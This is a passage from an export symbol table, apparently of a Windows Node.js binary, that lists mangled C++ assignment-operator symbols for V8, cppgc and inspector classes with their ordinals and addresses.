                                                                                                                                                                                                                                    ??4HeapStatistics@v8@@QEAAAEAV01@$$QEAV01@@Z20200x140097ef0
                                                                                                                                                                                                                                    ??4HeapStatistics@v8@@QEAAAEAV01@AEBV01@@Z20210x140097eb0
                                                                                                                                                                                                                                    ??4HiddenFactory@internal@v8@@QEAAAEAV012@$$QEAV012@@Z20220x1400972c0
                                                                                                                                                                                                                                    ??4HiddenFactory@internal@v8@@QEAAAEAV012@AEBV012@@Z20230x1400972c0
                                                                                                                                                                                                                                    ??4HiddenLocalFactory@internal@v8@@QEAAAEAV012@$$QEAV012@@Z20240x140097a90
                                                                                                                                                                                                                                    ??4HiddenLocalFactory@internal@v8@@QEAAAEAV012@AEBV012@@Z20250x140097a90
                                                                                                                                                                                                                                    ??4I32PairToBigIntDescriptor@internal@v8@@QEAAAEAV012@$$QEAV012@@Z20260x140097a90
                                                                                                                                                                                                                                    ??4I32PairToBigIntDescriptor@internal@v8@@QEAAAEAV012@AEBV012@@Z20270x140097a90
                                                                                                                                                                                                                                    ??4I64ToBigIntDescriptor@internal@v8@@QEAAAEAV012@$$QEAV012@@Z20280x140097a90
                                                                                                                                                                                                                                    ??4I64ToBigIntDescriptor@internal@v8@@QEAAAEAV012@AEBV012@@Z20290x140097a90
                                                                                                                                                                                                                                    ??4ImportAssertionsKeyComparer@internal@v8@@QEAAAEAU012@$$QEAU012@@Z20300x1400972c0
                                                                                                                                                                                                                                    ??4ImportAssertionsKeyComparer@internal@v8@@QEAAAEAU012@AEBU012@@Z20310x1400972c0
                                                                                                                                                                                                                                    ??4Inputs@Node@compiler@internal@v8@@QEAAAEAV01234@$$QEAV01234@@Z20320x140097890
                                                                                                                                                                                                                                    ??4Inputs@Node@compiler@internal@v8@@QEAAAEAV01234@AEBV01234@@Z20330x140097880
                                                                                                                                                                                                                                    ??4Inspectable@V8InspectorSession@v8_inspector@@QEAAAEAV012@AEBV012@@Z20340x1400972c0
                                                                                                                                                                                                                                    ??4InstantiationResultResolver@wasm@internal@v8@@QEAAAEAV0123@AEBV0123@@Z20350x1400972c0
                                                                                                                                                                                                                                    ??4InstructionOperand@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z20360x140097a90
                                                                                                                                                                                                                                    ??4InstructionOperand@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z20370x140097a90
                                                                                                                                                                                                                                    ??4Int16Array@v8@@QEAAAEAV01@$$QEAV01@@Z20380x1400972c0
                                                                                                                                                                                                                                    ??4Int16Array@v8@@QEAAAEAV01@AEBV01@@Z20390x1400972c0
                                                                                                                                                                                                                                    ??4Int32@v8@@QEAAAEAV01@$$QEAV01@@Z20400x1400972c0
                                                                                                                                                                                                                                    ??4Int32@v8@@QEAAAEAV01@AEBV01@@Z20410x1400972c0
                                                                                                                                                                                                                                    ??4Int32Array@v8@@QEAAAEAV01@$$QEAV01@@Z20420x1400972c0
                                                                                                                                                                                                                                    ??4Int32Array@v8@@QEAAAEAV01@AEBV01@@Z20430x1400972c0
                                                                                                                                                                                                                                    ??4Int64LoweringSpecialCase@compiler@internal@v8@@QEAAAEAU0123@$$QEAU0123@@Z20440x14053a2d0
                                                                                                                                                                                                                                    ??4Int64LoweringSpecialCase@compiler@internal@v8@@QEAAAEAU0123@AEBU0123@@Z20450x14053a370
                                                                                                                                                                                                                                    ??4Int8Array@v8@@QEAAAEAV01@$$QEAV01@@Z20460x1400972c0
                                                                                                                                                                                                                                    ??4Int8Array@v8@@QEAAAEAV01@AEBV01@@Z20470x1400972c0
                                                                                                                                                                                                                                    ??4Integer@v8@@QEAAAEAV01@$$QEAV01@@Z20480x1400972c0
                                                                                                                                                                                                                                    ??4Integer@v8@@QEAAAEAV01@AEBV01@@Z20490x1400972c0
                                                                                                                                                                                                                                    ??4InterpreterDispatchDescriptor@internal@v8@@QEAAAEAV012@$$QEAV012@@Z20500x140097a90
                                                                                                                                                                                                                                    ??4InterpreterDispatchDescriptor@internal@v8@@QEAAAEAV012@AEBV012@@Z20510x140097a90
                                                                                                                                                                                                                                    ??4InvalidatedSlotsCleanup@internal@v8@@QEAAAEAV012@$$QEAV012@@Z20520x140539f10
                                                                                                                                                                                                                                    ??4InvalidatedSlotsCleanup@internal@v8@@QEAAAEAV012@AEBV012@@Z20530x140539fa0
                                                                                                                                                                                                                                    ??4InvalidatedSlotsFilter@internal@v8@@QEAAAEAV012@$$QEAV012@@Z20540x14053a020
                                                                                                                                                                                                                                    ??4InvalidatedSlotsFilter@internal@v8@@QEAAAEAV012@AEBV012@@Z20550x14053a0b0
                                                                                                                                                                                                                                    ??4IrOpcode@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z20560x1400972c0
                                                                                                                                                                                                                                    ??4IrOpcode@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z20570x1400972c0
                                                                                                                                                                                                                                    ??4IrregexpInterpreter@internal@v8@@QEAAAEAV012@$$QEAV012@@Z20580x1400972c0
                                                                                                                                                                                                                                    ??4IrregexpInterpreter@internal@v8@@QEAAAEAV012@AEBV012@@Z20590x1400972c0
                                                                                                                                                                                                                                    ??4IsolatePlatformDelegate@node@@QEAAAEAV01@$$QEAV01@@Z20600x1400972c0
                                                                                                                                                                                                                                    ??4IsolatePlatformDelegate@node@@QEAAAEAV01@AEBV01@@Z20610x1400972c0
                                                                                                                                                                                                                                    ??4JSFunctionRef@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z20620x140097880
                                                                                                                                                                                                                                    ??4JSFunctionRef@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z20630x140097880
                                                                                                                                                                                                                                    ??4JSON@v8@@QEAAAEAV01@$$QEAV01@@Z20640x1400972c0
                                                                                                                                                                                                                                    ??4JSON@v8@@QEAAAEAV01@AEBV01@@Z20650x1400972c0
                                                                                                                                                                                                                                    ??4JumpTableTargetOffset@interpreter@internal@v8@@QEAAAEAU0123@$$QEAU0123@@Z20660x140097aa0
                                                                                                                                                                                                                                    ??4JumpTableTargetOffset@interpreter@internal@v8@@QEAAAEAU0123@AEBU0123@@Z20670x140097a90
                                                                                                                                                                                                                                    ??4JumpTableTargetOffsets@interpreter@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z20680x14053a130
                                                                                                                                                                                                                                    ??4JumpTableTargetOffsets@interpreter@internal@v8@@QEAAAEAV0123@AEBV0123@@Z20690x1400978f0
                                                                                                                                                                                                                                    ??4JumpThreading@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z20700x1400972c0
                                                                                                                                                                                                                                    ??4JumpThreading@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z20710x1400972c0
                                                                                                                                                                                                                                    ??4LiveEdit@internal@v8@@QEAAAEAV012@$$QEAV012@@Z20720x1400972c0
                                                                                                                                                                                                                                    ??4LiveEdit@internal@v8@@QEAAAEAV012@AEBV012@@Z20730x1400972c0
                                                                                                                                                                                                                                    ??4LivenessBroker@cppgc@@QEAAAEAV01@$$QEAV01@@Z20740x1400972c0
                                                                                                                                                                                                                                    ??4LivenessBroker@cppgc@@QEAAAEAV01@AEBV01@@Z20750x1400972c0
                                                                                                                                                                                                                                    ??4LivenessBrokerFactory@internal@cppgc@@QEAAAEAV012@$$QEAV012@@Z20760x1400972c0
                                                                                                                                                                                                                                    ??4LivenessBrokerFactory@internal@cppgc@@QEAAAEAV012@AEBV012@@Z20770x1400972c0
                                                                                                                                                                                                                                    ??4LocalAllocationBuffer@internal@v8@@QEAAAEAV012@$$QEAV012@@Z20780x140a9bba0
                                                                                                                                                                                                                                    ??4LocalDeclEncoder@wasm@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z20790x140633570
                                                                                                                                                                                                                                    ??4LocalDeclEncoder@wasm@internal@v8@@QEAAAEAV0123@AEBV0123@@Z20800x1406336f0
                                                                                                                                                                                                                                    ??4LocalFactory@internal@v8@@QEAAAEAV012@$$QEAV012@@Z20810x140097a90
                                                                                                                                                                                                                                    ??4LocalFactory@internal@v8@@QEAAAEAV012@AEBV012@@Z20820x140097a90
                                                                                                                                                                                                                                    ??4Location@debug@v8@@QEAAAEAV012@$$QEAV012@@Z20830x14053a150
                                                                                                                                                                                                                                    ??4Location@debug@v8@@QEAAAEAV012@AEBV012@@Z20840x14053a170
                                                                                                                                                                                                                                    ??4Location@v8@@QEAAAEAV01@$$QEAV01@@Z20850x140097aa0
                                                                                                                                                                                                                                    ??4Location@v8@@QEAAAEAV01@AEBV01@@Z20860x140097a90
                                                                                                                                                                                                                                    ??4LongTaskStats@metrics@v8@@QEAAAEAU012@$$QEAU012@@Z20870x140097fe0
                                                                                                                                                                                                                                    ??4LongTaskStats@metrics@v8@@QEAAAEAU012@AEBU012@@Z20880x140097fc0
                                                                                                                                                                                                                                    ??4LoopFinder@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z20890x1400972c0
                                                                                                                                                                                                                                    ??4LoopFinder@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z20900x1400972c0
                                                                                                                                                                                                                                    ??4MakeGarbageCollectedTraitInternal@internal@cppgc@@QEAAAEAV012@$$QEAV012@@Z20910x1400972c0
                                                                                                                                                                                                                                    ??4MakeGarbageCollectedTraitInternal@internal@cppgc@@QEAAAEAV012@AEBV012@@Z20920x1400972c0
                                                                                                                                                                                                                                    ??4Malloced@internal@v8@@QEAAAEAV012@$$QEAV012@@Z20930x1400972c0
                                                                                                                                                                                                                                    ??4Malloced@internal@v8@@QEAAAEAV012@AEBV012@@Z20940x1400972c0
                                                                                                                                                                                                                                    ??4Map@v8@@QEAAAEAV01@$$QEAV01@@Z20950x1400972c0
                                                                                                                                                                                                                                    ??4Map@v8@@QEAAAEAV01@AEBV01@@Z20960x1400972c0
                                                                                                                                                                                                                                    ??4MapRef@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z20970x140097880
                                                                                                                                                                                                                                    ??4MapRef@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z20980x140097880
                                                                                                                                                                                                                                    ??4MapUpdater@internal@v8@@QEAAAEAV012@$$QEAV012@@Z20990x14053a190
                                                                                                                                                                                                                                    ??4MapUpdater@internal@v8@@QEAAAEAV012@AEBV012@@Z21000x14053a240
                                                                                                                                                                                                                                    ??4MeasureMemoryDelegate@internal@v8@@QEAAAEAV012@AEBV012@@Z21010x140ab9970
                                                                                                                                                                                                                                    ??4MeasureMemoryDelegate@v8@@QEAAAEAV01@AEBV01@@Z21020x1400972c0
                                                                                                                                                                                                                                    ??4MemoryChunkLayout@internal@v8@@QEAAAEAV012@$$QEAV012@@Z21030x1400972c0
                                                                                                                                                                                                                                    ??4MemoryChunkLayout@internal@v8@@QEAAAEAV012@AEBV012@@Z21040x1400972c0
                                                                                                                                                                                                                                    ??4MemoryMappedFile@OS@base@v8@@QEAAAEAV0123@AEBV0123@@Z21050x1400972c0
                                                                                                                                                                                                                                    ??4MemoryRegion@internal@cppgc@@QEAAAEAV012@$$QEAV012@@Z21060x140097ca0
                                                                                                                                                                                                                                    ??4MemoryRegion@internal@cppgc@@QEAAAEAV012@AEBV012@@Z21070x140097880
                                                                                                                                                                                                                                    ??4Message@v8@@QEAAAEAV01@$$QEAV01@@Z21080x1400972c0
                                                                                                                                                                                                                                    ??4Message@v8@@QEAAAEAV01@AEBV01@@Z21090x1400972c0
                                                                                                                                                                                                                                    ??4MessageLocation@internal@v8@@QEAAAEAV012@$$QEAV012@@Z21100x14053a2a0
                                                                                                                                                                                                                                    ??4MessageLocation@internal@v8@@QEAAAEAV012@AEBV012@@Z21110x140097fc0
                                                                                                                                                                                                                                    ??4Module@v8@@QEAAAEAV01@$$QEAV01@@Z21120x1400972c0
                                                                                                                                                                                                                                    ??4Module@v8@@QEAAAEAV01@AEBV01@@Z21130x1400972c0
                                                                                                                                                                                                                                    ??4ModuleRequest@v8@@QEAAAEAV01@$$QEAV01@@Z21140x1400972c0
                                                                                                                                                                                                                                    ??4ModuleRequest@v8@@QEAAAEAV01@AEBV01@@Z21150x1400972c0
                                                                                                                                                                                                                                    ??4ModuleRequestComparer@SourceTextModuleDescriptor@internal@v8@@QEAAAEAU0123@$$QEAU0123@@Z21160x1400972c0
                                                                                                                                                                                                                                    ??4ModuleRequestComparer@SourceTextModuleDescriptor@internal@v8@@QEAAAEAU0123@AEBU0123@@Z21170x1400972c0
                                                                                                                                                                                                                                    ??4ModuleWireBytes@wasm@internal@v8@@QEAAAEAU0123@$$QEAU0123@@Z21180x140097880
                                                                                                                                                                                                                                    ??4ModuleWireBytes@wasm@internal@v8@@QEAAAEAU0123@AEBU0123@@Z21190x140097880
                                                                                                                                                                                                                                    ??4MultiIsolatePlatform@node@@QEAAAEAV01@AEBV01@@Z21200x1400972c0
                                                                                                                                                                                                                                    ??4Name@v8@@QEAAAEAV01@$$QEAV01@@Z21210x1400972c0
                                                                                                                                                                                                                                    ??4Name@v8@@QEAAAEAV01@AEBV01@@Z21220x1400972c0
                                                                                                                                                                                                                                    ??4NameDictionary@internal@v8@@QEAAAEAV012@$$QEAV012@@Z21230x140097a90
                                                                                                                                                                                                                                    ??4NameDictionary@internal@v8@@QEAAAEAV012@AEBV012@@Z21240x140097a90
                                                                                                                                                                                                                                    ??4NameProvider@cppgc@@QEAAAEAV01@AEBV01@@Z21250x1400972c0
                                                                                                                                                                                                                                    ??4NameToIndexHashTable@internal@v8@@QEAAAEAV012@$$QEAV012@@Z21260x140097a90
                                                                                                                                                                                                                                    ??4NameToIndexHashTable@internal@v8@@QEAAAEAV012@AEBV012@@Z21270x140097a90
                                                                                                                                                                                                                                    ??4NameTraitBase@internal@cppgc@@QEAAAEAV012@$$QEAV012@@Z21280x1400972c0
                                                                                                                                                                                                                                    ??4NameTraitBase@internal@cppgc@@QEAAAEAV012@AEBV012@@Z21290x1400972c0
                                                                                                                                                                                                                                    ??4NativeContextInferrer@internal@v8@@QEAAAEAV012@$$QEAV012@@Z21300x1400972c0
                                                                                                                                                                                                                                    ??4NativeContextInferrer@internal@v8@@QEAAAEAV012@AEBV012@@Z21310x1400972c0
                                                                                                                                                                                                                                    ??4NativeContextStats@internal@v8@@QEAAAEAV012@$$QEAV012@@Z21320x14053a2d0
                                                                                                                                                                                                                                    ??4NativeContextStats@internal@v8@@QEAAAEAV012@AEBV012@@Z21330x14053a370
                                                                                                                                                                                                                                    ??4NodeProperties@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z21340x1400972c0
                                                                                                                                                                                                                                    ??4NodeProperties@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z21350x1400972c0
                                                                                                                                                                                                                                    ??4NormalPageMemoryPool@internal@cppgc@@QEAAAEAV012@AEBV012@@Z21360x1405044c0
                                                                                                                                                                                                                                    ??4Number@v8@@QEAAAEAV01@$$QEAV01@@Z21370x1400972c0
                                                                                                                                                                                                                                    ??4Number@v8@@QEAAAEAV01@AEBV01@@Z21380x1400972c0
                                                                                                                                                                                                                                    ??4NumberObject@v8@@QEAAAEAV01@$$QEAV01@@Z21390x1400972c0
                                                                                                                                                                                                                                    ??4NumberObject@v8@@QEAAAEAV01@AEBV01@@Z21400x1400972c0
                                                                                                                                                                                                                                    ??4OSROptimizedCodeCache@internal@v8@@QEAAAEAV012@$$QEAV012@@Z21410x140097a90
                                                                                                                                                                                                                                    ??4OSROptimizedCodeCache@internal@v8@@QEAAAEAV012@AEBV012@@Z21420x140097a90
                                                                                                                                                                                                                                    ??4Object@v8@@QEAAAEAV01@$$QEAV01@@Z21430x1400972c0
                                                                                                                                                                                                                                    ??4Object@v8@@QEAAAEAV01@AEBV01@@Z21440x1400972c0
                                                                                                                                                                                                                                    ??4ObjectHashSet@internal@v8@@QEAAAEAV012@$$QEAV012@@Z21450x140097a90
                                                                                                                                                                                                                                    ??4ObjectHashSet@internal@v8@@QEAAAEAV012@AEBV012@@Z21460x140097a90
                                                                                                                                                                                                                                    ??4ObjectHashTable@internal@v8@@QEAAAEAV012@$$QEAV012@@Z21470x140097a90
                                                                                                                                                                                                                                    ??4ObjectHashTable@internal@v8@@QEAAAEAV012@AEBV012@@Z21480x140097a90
                                                                                                                                                                                                                                    ??4ObjectIterator@internal@v8@@QEAAAEAV012@AEBV012@@Z21490x1400972c0
                                                                                                                                                                                                                                    ??4ObjectRef@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z21500x140097ca0
                                                                                                                                                                                                                                    ??4ObjectRef@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z21510x140097880
                                                                                                                                                                                                                                    ??4ObjectTemplate@v8@@QEAAAEAV01@$$QEAV01@@Z21520x1400972c0
                                                                                                                                                                                                                                    ??4ObjectTemplate@v8@@QEAAAEAV01@AEBV01@@Z21530x1400972c0
                                                                                                                                                                                                                                    ??4Operand@internal@v8@@QEAAAEAV012@AEBV012@@Z21540x14053a170
                                                                                                                                                                                                                                    ??4OrderedHashMap@internal@v8@@QEAAAEAV012@$$QEAV012@@Z21550x140097a90
                                                                                                                                                                                                                                    ??4OrderedHashMap@internal@v8@@QEAAAEAV012@AEBV012@@Z21560x140097a90
                                                                                                                                                                                                                                    ??4OrderedHashMapHandler@internal@v8@@QEAAAEAV012@$$QEAV012@@Z21570x1400972c0
                                                                                                                                                                                                                                    ??4OrderedHashMapHandler@internal@v8@@QEAAAEAV012@AEBV012@@Z21580x1400972c0
                                                                                                                                                                                                                                    ??4OrderedHashSet@internal@v8@@QEAAAEAV012@$$QEAV012@@Z21590x140097a90
                                                                                                                                                                                                                                    ??4OrderedHashSet@internal@v8@@QEAAAEAV012@AEBV012@@Z21600x140097a90
                                                                                                                                                                                                                                    ??4OrderedHashSetHandler@internal@v8@@QEAAAEAV012@$$QEAV012@@Z21610x1400972c0
                                                                                                                                                                                                                                    ??4OrderedHashSetHandler@internal@v8@@QEAAAEAV012@AEBV012@@Z21620x1400972c0
                                                                                                                                                                                                                                    ??4OrderedNameDictionary@internal@v8@@QEAAAEAV012@$$QEAV012@@Z21630x140097a90
                                                                                                                                                                                                                                    ??4OrderedNameDictionary@internal@v8@@QEAAAEAV012@AEBV012@@Z21640x140097a90
                                                                                                                                                                                                                                    ??4OrderedNameDictionaryHandler@internal@v8@@QEAAAEAV012@$$QEAV012@@Z21650x1400972c0
                                                                                                                                                                                                                                    ??4OrderedNameDictionaryHandler@internal@v8@@QEAAAEAV012@AEBV012@@Z21660x1400972c0
                                                                                                                                                                                                                                    ??4OutputStream@v8@@QEAAAEAV01@AEBV01@@Z21670x1400972c0
                                                                                                                                                                                                                                    ??4PageMemory@internal@cppgc@@QEAAAEAV012@$$QEAV012@@Z21680x140504530
                                                                                                                                                                                                                                    ??4PageMemory@internal@cppgc@@QEAAAEAV012@AEBV012@@Z21690x140097fc0
                                                                                                                                                                                                                                    ??4PageMemoryRegionTree@internal@cppgc@@QEAAAEAV012@AEBV012@@Z21700x140504550
                                                                                                                                                                                                                                    ??4PagedSpaceIterator@internal@v8@@QEAAAEAV012@$$QEAV012@@Z21710x140097890
                                                                                                                                                                                                                                    ??4PagedSpaceIterator@internal@v8@@QEAAAEAV012@AEBV012@@Z21720x140097880
                                                                                                                                                                                                                                    ??4PeeledIteration@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z21730x1400972c0
                                                                                                                                                                                                                                    ??4PeeledIteration@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z21740x1400972c0
                                                                                                                                                                                                                                    ??4PersistentHandleVisitor@v8@@QEAAAEAV01@AEBV01@@Z21750x1400972c0
                                                                                                                                                                                                                                    ??4PersistentRegionLock@internal@cppgc@@QEAAAEAV012@AEBV012@@Z21760x1400972c0
                                                                                                                                                                                                                                    ??4Platform@cppgc@@QEAAAEAV01@AEBV01@@Z21770x1400972c0
                                                                                                                                                                                                                                    ??4PrefinalizerRegistration@internal@cppgc@@QEAAAEAV012@$$QEAV012@@Z21780x1400972c0
                                                                                                                                                                                                                                    ??4PrefinalizerRegistration@internal@cppgc@@QEAAAEAV012@AEBV012@@Z21790x1400972c0
                                                                                                                                                                                                                                    ??4Primitive@v8@@QEAAAEAV01@$$QEAV01@@Z21800x1400972c0
                                                                                                                                                                                                                                    ??4Primitive@v8@@QEAAAEAV01@AEBV01@@Z21810x1400972c0
                                                                                                                                                                                                                                    ??4PrimitiveArray@v8@@QEAAAEAV01@$$QEAV01@@Z21820x1400972c0
                                                                                                                                                                                                                                    ??4PrimitiveArray@v8@@QEAAAEAV01@AEBV01@@Z21830x1400972c0
                                                                                                                                                                                                                                    ??4Private@v8@@QEAAAEAV01@$$QEAV01@@Z21840x1400972c0
                                                                                                                                                                                                                                    ??4Private@v8@@QEAAAEAV01@AEBV01@@Z21850x1400972c0
                                                                                                                                                                                                                                    ??4ProcessHeapStatistics@cppgc@@QEAAAEAV01@$$QEAV01@@Z21860x1400972c0
                                                                                                                                                                                                                                    ??4ProcessHeapStatistics@cppgc@@QEAAAEAV01@AEBV01@@Z21870x1400972c0
                                                                                                                                                                                                                                    ??4Promise@v8@@QEAAAEAV01@$$QEAV01@@Z21880x1400972c0
                                                                                                                                                                                                                                    ??4Promise@v8@@QEAAAEAV01@AEBV01@@Z21890x1400972c0
                                                                                                                                                                                                                                    ??4PropertyIterator@debug@v8@@QEAAAEAV012@AEBV012@@Z21900x1400972c0
                                                                                                                                                                                                                                    ??4Proxy@v8@@QEAAAEAV01@$$QEAV01@@Z21910x1400972c0
                                                                                                                                                                                                                                    ??4Proxy@v8@@QEAAAEAV01@AEBV01@@Z21920x1400972c0
                                                                                                                                                                                                                                    ??4RandomNumberGenerator@base@v8@@QEAAAEAV012@$$QEAV012@@Z21930x140097e10
                                                                                                                                                                                                                                    ??4RandomNumberGenerator@base@v8@@QEAAAEAV012@AEBV012@@Z21940x1400978f0
                                                                                                                                                                                                                                    ??4Recorder@metrics@v8@@QEAAAEAV012@AEBV012@@Z21950x1400972c0
                                                                                                                                                                                                                                    ??4Reducer@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z21960x1400972c0
                                                                                                                                                                                                                                    ??4RegExp@v8@@QEAAAEAV01@$$QEAV01@@Z21970x1400972c0
                                                                                                                                                                                                                                    ??4RegExp@v8@@QEAAAEAV01@AEBV01@@Z21980x1400972c0
                                                                                                                                                                                                                                    ??4RegExpParser@internal@v8@@QEAAAEAV012@$$QEAV012@@Z21990x1400972c0
                                                                                                                                                                                                                                    ??4RegExpParser@internal@v8@@QEAAAEAV012@AEBV012@@Z22000x1400972c0
                                                                                                                                                                                                                                    ??4Register@interpreter@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z22010x14053a4d0
                                                                                                                                                                                                                                    ??4Register@interpreter@internal@v8@@QEAAAEAV0123@AEBV0123@@Z22020x14053a4d0
                                                                                                                                                                                                                                    ??4RegisterState@v8@@QEAAAEAU01@AEBU01@@Z22030x140c77c30
                                                                                                                                                                                                                                    ??4RemoteObject@API@Runtime@protocol@v8_inspector@@QEAAAEAV01234@$$QEAV01234@@Z22040x1400972c0
                                                                                                                                                                                                                                    ??4RemoteObject@API@Runtime@protocol@v8_inspector@@QEAAAEAV01234@AEBV01234@@Z22050x1400972c0
                                                                                                                                                                                                                                    ??4RepresentationChanger@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z22060x1411f36c0
                                                                                                                                                                                                                                    ??4RepresentationChanger@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z22070x140097f70
                                                                                                                                                                                                                                    ??4Resolver@Promise@v8@@QEAAAEAV012@$$QEAV012@@Z22080x1400972c0
                                                                                                                                                                                                                                    ??4Resolver@Promise@v8@@QEAAAEAV012@AEBV012@@Z22090x1400972c0
                                                                                                                                                                                                                                    ??4ResourceConstraints@v8@@QEAAAEAV01@$$QEAV01@@Z22100x1400980b0
                                                                                                                                                                                                                                    ??4ResourceConstraints@v8@@QEAAAEAV01@AEBV01@@Z22110x140098090
                                                                                                                                                                                                                                    ??4ResumeJumpTarget@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z22120x14111ac20
                                                                                                                                                                                                                                    ??4ResumeJumpTarget@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z22130x14053a170
                                                                                                                                                                                                                                    ??4SameThreadEnabledCheckingPolicyBase@internal@cppgc@@QEAAAEAV012@$$QEAV012@@Z22140x140097a90
                                                                                                                                                                                                                                    ??4SameThreadEnabledCheckingPolicyBase@internal@cppgc@@QEAAAEAV012@AEBV012@@Z22150x140097a90
                                                                                                                                                                                                                                    ??4ScannerStream@internal@v8@@QEAAAEAV012@$$QEAV012@@Z22160x1400972c0
                                                                                                                                                                                                                                    ??4ScannerStream@internal@v8@@QEAAAEAV012@AEBV012@@Z22170x1400972c0
                                                                                                                                                                                                                                    ??4ScheduleVerifier@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z22180x1400972c0
                                                                                                                                                                                                                                    ??4ScheduleVerifier@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z22190x1400972c0
                                                                                                                                                                                                                                    ??4Script@debug@v8@@QEAAAEAV012@$$QEAV012@@Z22200x1400972c0
                                                                                                                                                                                                                                    ??4Script@debug@v8@@QEAAAEAV012@AEBV012@@Z22210x1400972c0
                                                                                                                                                                                                                                    ??4Script@v8@@QEAAAEAV01@$$QEAV01@@Z22220x1400972c0
                                                                                                                                                                                                                                    ??4Script@v8@@QEAAAEAV01@AEBV01@@Z22230x1400972c0
                                                                                                                                                                                                                                    ??4ScriptCompiler@v8@@QEAAAEAV01@$$QEAV01@@Z22240x1400972c0
                                                                                                                                                                                                                                    ??4ScriptCompiler@v8@@QEAAAEAV01@AEBV01@@Z22250x1400972c0
                                                                                                                                                                                                                                    ??4ScriptData@Coverage@debug@v8@@QEAAAEAV0123@$$QEAV0123@@Z22260x140539910
                                                                                                                                                                                                                                    ??4ScriptData@TypeProfile@debug@v8@@QEAAAEAV0123@$$QEAV0123@@Z22270x140539910
                                                                                                                                                                                                                                    ??4ScriptOrModule@v8@@QEAAAEAV01@$$QEAV01@@Z22280x1400972c0
                                                                                                                                                                                                                                    ??4ScriptOrModule@v8@@QEAAAEAV01@AEBV01@@Z22290x1400972c0
                                                                                                                                                                                                                                    ??4ScriptSource@debug@v8@@QEAAAEAV012@$$QEAV012@@Z22300x1400972c0
                                                                                                                                                                                                                                    ??4ScriptSource@debug@v8@@QEAAAEAV012@AEBV012@@Z22310x1400972c0
                                                                                                                                                                                                                                    ??4ScriptStreamingTask@ScriptCompiler@v8@@QEAAAEAV012@$$QEAV012@@Z22320x140097a90
                                                                                                                                                                                                                                    ??4ScriptStreamingTask@ScriptCompiler@v8@@QEAAAEAV012@AEBV012@@Z22330x140097a90
                                                                                                                                                                                                                                    ??4SearchMatch@API@Debugger@protocol@v8_inspector@@QEAAAEAV01234@$$QEAV01234@@Z22340x1400972c0
                                                                                                                                                                                                                                    ??4SearchMatch@API@Debugger@protocol@v8_inspector@@QEAAAEAV01234@AEBV01234@@Z22350x1400972c0
                                                                                                                                                                                                                                    ??4Set@v8@@QEAAAEAV01@$$QEAV01@@Z22360x1400972c0
                                                                                                                                                                                                                                    ??4Set@v8@@QEAAAEAV01@AEBV01@@Z22370x1400972c0
                                                                                                                                                                                                                                    ??4SharedArrayBuffer@v8@@QEAAAEAV01@$$QEAV01@@Z22380x1400972c0
                                                                                                                                                                                                                                    ??4SharedArrayBuffer@v8@@QEAAAEAV01@AEBV01@@Z22390x1400972c0
                                                                                                                                                                                                                                    ??4SharedFunctionInfoRef@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z22400x140097880
                                                                                                                                                                                                                                    ??4SharedFunctionInfoRef@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z22410x140097880
                                                                                                                                                                                                                                    ??4SharedMemoryStatistics@v8@@QEAAAEAV01@$$QEAV01@@Z22420x140097e10
                                                                                                                                                                                                                                    ??4SharedMemoryStatistics@v8@@QEAAAEAV01@AEBV01@@Z22430x1400978f0
                                                                                                                                                                                                                                    ??4Signature@v8@@QEAAAEAV01@$$QEAV01@@Z22440x1400972c0
                                                                                                                                                                                                                                    ??4Signature@v8@@QEAAAEAV01@AEBV01@@Z22450x1400972c0
                                                                                                                                                                                                                                    ??4SignatureMap@wasm@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z22460x14053a4e0
                                                                                                                                                                                                                                    ??4SimdShuffle@wasm@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z22470x1400972c0
                                                                                                                                                                                                                                    ??4SimdShuffle@wasm@internal@v8@@QEAAAEAV0123@AEBV0123@@Z22480x1400972c0
                                                                                                                                                                                                                                    ??4SimdSwizzle@wasm@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z22490x1400972c0
                                                                                                                                                                                                                                    ??4SimdSwizzle@wasm@internal@v8@@QEAAAEAV0123@AEBV0123@@Z22500x1400972c0
                                                                                                                                                                                                                                    ??4SourceIdAssigner@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z22510x141071530
                                                                                                                                                                                                                                    ??4SourceIdAssigner@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z22520x141071650
                                                                                                                                                                                                                                    ??4SourceLocation@cppgc@@QEAAAEAV01@$$QEAV01@@Z22530x140097e10
                                                                                                                                                                                                                                    ??4SourceLocation@cppgc@@QEAAAEAV01@AEBV01@@Z22540x1400978f0
                                                                                                                                                                                                                                    ??4SourcePositionTableBuilder@internal@v8@@QEAAAEAV012@$$QEAV012@@Z22550x14053a610
                                                                                                                                                                                                                                    ??4SourcePositionTableBuilder@internal@v8@@QEAAAEAV012@AEBV012@@Z22560x14053a760
